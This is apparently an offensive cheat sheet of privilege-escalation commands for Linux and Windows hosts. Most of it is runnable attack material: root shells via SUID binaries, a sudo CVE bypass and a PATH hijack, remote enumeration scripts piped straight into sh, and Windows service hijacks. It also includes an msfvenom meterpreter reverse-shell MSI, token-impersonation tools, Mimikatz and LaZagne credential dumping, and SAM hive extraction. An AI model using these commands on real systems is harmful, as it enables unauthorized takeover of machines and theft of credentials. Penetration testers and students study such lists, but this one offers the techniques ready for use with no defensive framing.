Privilege Escalation
Linux Privilege Escalation
Enumeration Scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./linenum.sh
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./linux-exploit-suggester.sh
Manual Enumeration
# System information
uname -a
cat /etc/issue
cat /etc/*-release
# Current user
id
whoami
groups
# Sudo permissions
sudo -l
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Writable files
find / -writable -type f 2>/dev/null
find / -perm -222 -type f 2>/dev/null
# World-writable directories
find / -writable -type d 2>/dev/null
# Running processes
ps aux
ps -ef
# Network connections
netstat -antup
ss -tulpn
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Installed packages
dpkg -l (Debian/Ubuntu)
rpm -qa (Red Hat/CentOS)
# Environment variables
env
echo $PATH
Common Techniques
SUID Exploitation
# GTFOBins - Check for SUID exploits
# https://gtfobins.github.io/
# Example: find
find . -exec /bin/sh -p \; -quit
# Example: vim
vim -c ':!/bin/sh'
# Example: nmap (old versions)
nmap --interactive
!sh
Sudo Exploitation
# Check sudo version
sudo -V
# Exploit sudo < 1.8.28 (CVE-2019-14287)
sudo -u#-1 /bin/bash
# GTFOBins for sudo
# https://gtfobins.github.io/
Capabilities
# Find capabilities
getcap -r / 2>/dev/null
# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Path Hijacking
# Check PATH
echo $PATH
# Create malicious binary
echo '#!/bin/bash\n/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
Kernel Exploits
# Check kernel version
uname -a
# Search for exploits
searchsploit linux kernel 4.4
Windows Privilege Escalation
Enumeration Scripts
# WinPEAS
.\winPEASany.exe
# PowerUp
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt
.\Seatbelt.exe -group=all
# Windows Exploit Suggester
python windows-exploit-suggester.py --database 2021-09-01-mssb.xls --systeminfo systeminfo.txt
Manual Enumeration
# System information
systeminfo
hostname
whoami /all
# User information
net user
net user <username>
net localgroup administrators
# Network information
ipconfig /all
netstat -ano
route print
# Scheduled tasks
schtasks /query /fo LIST /v
# Running processes
tasklist /v
wmic process list full
# Services
sc query
wmic service list brief
# Installed software
wmic product get name,version
dir "C:\Program Files"
dir "C:\Program Files (x86)"
# File permissions
icacls "C:\path\to\file"
# Registry
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Common Techniques
Unquoted Service Paths
# Find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Exploit
sc qc <service_name>
# Place malicious executable in unquoted path
Weak Service Permissions
# Check service permissions
sc qc <service_name>
icacls "C:\path\to\service.exe"
# Modify service binary path
sc config <service_name> binpath= "C:\path\to\malicious.exe"
sc start <service_name>
AlwaysInstallElevated
# Check registry
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Create malicious MSI
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o malicious.msi
# Install
msiexec /quiet /qn /i malicious.msi
Token Impersonation
# Incognito (Meterpreter)
use incognito
list_tokens -u
impersonate_token "DOMAIN\\User"
# PrintSpoofer (SeImpersonatePrivilege)
.\PrintSpoofer.exe -i -c cmd
# Juicy Potato
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
Credential Harvesting
# Mimikatz
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
# LaZagne
.\lazagne.exe all
# Registry
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
Useful Links
Linux Privilege Escalation
Windows Privilege Escalation